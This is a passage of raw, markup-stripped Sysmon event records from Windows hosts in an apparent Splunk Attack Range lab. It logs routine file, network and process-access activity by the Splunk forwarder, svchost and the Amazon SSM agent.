Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABB5ECAFD446886351620BA710E3EB71,SHA256=82C9C3005966B0BDA216E4D283BC86877A2A6DF3E3DED3461B3C4A447AA51390,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:00.814{2E1864BB-E13E-6299-1100-000000005F02}404NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=353409683FD28AC5CB7B0138974E9D57,SHA256=1E0CC26A48AFF35F41B41EE03C18DF9C98B77D3F9A760ECC402CBB1126A3E196,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:00.515{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED3A5A7B055B8B1D87D867DAA52A365,SHA256=A8485DF2857484795CD48B8C359C88EA682220D2309F33B46E4B6788C67B3906,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044238Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:00.782{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B50EE7B947D35EC815BF6B14F11E3E90,SHA256=06C3C7EB97EF764B2F273B18AFA3EB14811C21F18B12C1B4E05D2F7415DFF66C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:01.548{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A2915FA8B7797C2FE00EDE4BEDDF929,SHA256=CB6AE59CE2C70A402742957E2B14C9E1FB39943709DC2D559111AD9CF8EAE448,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044239Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:01.876{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93027B92834E96D3CB1BE8C2B29D583E,SHA256=13B0EDDE2CDD8A85EF36F52F8FB652A2C38277BB076CA2FCB90936A4736E5B70,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:58.778{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56371-false10.0.1.12-8000- 23542300x800000000000000044241Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:02.969{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81B6380D55656BC6174FA42EB02DFE0A,SHA256=7DF34DCDDB04427B0E77A044B04AB41CA904F8187BDEE0A2EBA514ED1AD6B08E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:02.682{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85AAC0BEBA9BF4EFE9E8AB8F820077D3,SHA256=8416055B650BF52B57FD8D932301E4F0AA4962501EE342C157E090B8EB7D6D16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044240Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:02.719{0A5DF930-E35C-6299-1200-000000006002}1004NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4E16DA5D5C959F8ECAEF0EA0B17E9A19,SHA256=54A77039344A9EE9867933B5607C34F3B6253B0C7611A372A6173623FF7B3A10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:03.785{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE50880554AB40D0B2D0555745675C7B,SHA256=59362B499A36D06E8BDD52CC4C1D57E3BF179A366CA826A940688368877B1ADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:04.915{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2937E26451C1E01E6F7A09B405C9BCCD,SHA256=4DBDA1BDC44A01C226E2AC6E6641B9F2B26C1D793D180021BF158E2B2E674751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044243Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:04.189{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044242Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:04.064{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1494F852C07EDB33BAA7B4DA1F2F891E,SHA256=43714316099DC7EC5475600278D1A0CB65B38EE59EF7C144481443A1D5891C59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044244Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:05.158{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2ED8D135225FEA3980B444C000F968D,SHA256=03D78ED4B6B8CC8DA76C11248CE19E68E668FCCA03E9FDF7D40DFCFAB0A914E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:05.321{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\respondent-20220603102417-227MD5=D22CF257E0732B5F4C22EC786659B3FF,SHA256=CD985CCC34CF20D24C2A0DD6C1AF3F982A03CB86FB6AC67C5C7E1BD670546944,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044247Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:06.252{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C2AA9FB877D30EB7C9E275D83D522D8,SHA256=F9EC0039A9E3D1C02A39714BE30464DB5E711790C4886663593B241293516FDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:06.331{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\surveyor-20220603102414-228MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:06.049{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEBFE2FCD31618B9A60402A26F7B770A,SHA256=3DCA04838AE984C4374A6A555297BF9EDF1F001609CD77DA6878953F43132AAA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044246Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:03.733{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52344-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x800000000000000044245Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:03.655{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52343-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044248Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:07.345{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3A61AE2CB9EC01A6CF52ADA976F6AC7,SHA256=1DF375AE5F933485A09564236478D9122A03ACC76E9D9A8482CF95577A454088,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:07.069{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAB3447B6DBB9AF6885A62509955AD6A,SHA256=5E45FE505B5ABEE6147D4B0DE1F0120C2DBE82D85D98BD1E2D285129E0C6CF22,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:04.709{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56372-false10.0.1.12-8000- 23542300x800000000000000044249Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:08.439{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4558CEC08D5468A09BEB46446DB4A376,SHA256=677FFBF69EF1F580CBD6E292F979CE79A3FD9FAC21C787BFE6905CF136D5D327,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:08.100{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA669A614805C43931E23947ECEA2597,SHA256=2CBFBAF3534181668CBC7187836D86962601F408BDE8B4275EC44E0F20946EFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044250Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:09.533{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DC402ECED398E750AA3596141974B56,SHA256=6827065EA072EC0383F26632862CA3C55530C53A3DF3F936E7CFF3B036871F4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:09.199{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F210689D311229F4B1D0E31928BADA09,SHA256=D4A5DBF72F8DE0BC19122687B93520918DB3B1B1BB0C592A41589304C6BEF2C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044251Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:10.627{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=148FC82666983128EC2362DDF5B6857C,SHA256=42AF7D7D7BA5B92458B996A179DB131259E98872206A9F1BCD2BA26C44086D01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:10.230{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C7AED195B40D5ECFC687697F83F31DC,SHA256=8AB65CC6BCA37E7D4EF8007E2A49FC332F13A1456D4BF5304BE2CA61EED25982,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044253Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:11.720{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FD6D09FCC4A56F412E693FA527021D9,SHA256=EC2BF6BFA6AA23FC91D1D6B50D72CD7B569D98DD07E4E1E1DAB7811D6C98809D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:11.247{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2855ABA6F199483319938BC110F353DC,SHA256=3551FCC62AE842F91D6971213F549AD6B6A334110452B716901A71B49981D165,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044252Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:08.733{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52345-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044254Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:12.814{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4365A2CE12EB0278E822DD001B19271D,SHA256=681AF94CD6E20BD35E010BAFB94F08A380D10DD85793F26431E6444CB0833275,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:12.298{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49A287FEC900E4419EC7AD6F2403F3BF,SHA256=B6F9A9BE3C1AEC99CCDE7A4CF000FF144486587AB52D55BE4D745B55281132EC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:09.755{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56373-false10.0.1.12-8000- 23542300x800000000000000044255Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:13.908{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=559A325DB6A758000D8469ABE6DE98F3,SHA256=34B26F33D03B1FAB99F486BC7BEF0CA57D129BAB6F2164F9D349EFFB019B4122,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:13.415{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10493D3BD186D59C4C973133A1BE35FD,SHA256=14F9636EF6EFB92629A7D4C65E17A8A1D841E1F98F17186F5C634DCC63F1E9DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:14.467{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=848936726A08967A5146511410D44C83,SHA256=3AFE8AC8E40A119370B7EBB3E0CDFF8338F7DC50CB5B04E416007BA0F4042F11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:15.582{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42B7E0012515CF3E0F80AFED60D0254E,SHA256=5292B91D07C2641C8564B195C5B55786A94019EFD80B6E0DFCDA9424FD74F433,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044256Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:15.002{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F64EAC08A92F8CBCFB071156CFDDC128,SHA256=45DD9BC4A1C08B9F3C1BBA2C665A00DAD9AE48C6D1F0F46461F66EF85D8552BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:16.612{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16BF976365C6F93E8C7FF816A7A8A2C0,SHA256=844B318E810B3842255464E76F4230893498A7472E457FA9A1377D8045E96D74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044258Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:16.095{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7B5DD761B82EE0638A7E5A0066BA094,SHA256=2436627EE4BB4E38F66DAA59BBCC06C109FDFC321B6EBE754AB2F9530EC5869B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044257Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:13.795{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52346-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000205306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:17.715{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B807CEC3E809DEFBD8DACAE9E5D6BEA8,SHA256=A98B68329F904B587305261D687A6E979BA40439A86C46A8F80FD5CFAB4C0D87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044259Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:17.189{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=477CF728A98F2E9F2A9BAC0D6AC4EFCC,SHA256=4C41EFC1AADD12EE0EF3AF7FB1A5D3F596631053458A4749FC2DF95D47B320E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:17.453{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=6977949B65BDAF87C6900A1087116833,SHA256=546C0198850B9D3C77BBF7961D05A0802A303C26DE378041BD1AAB698D3B051B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:17.431{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1829-629A-4C42-000000005F02}7408C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:17.431{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 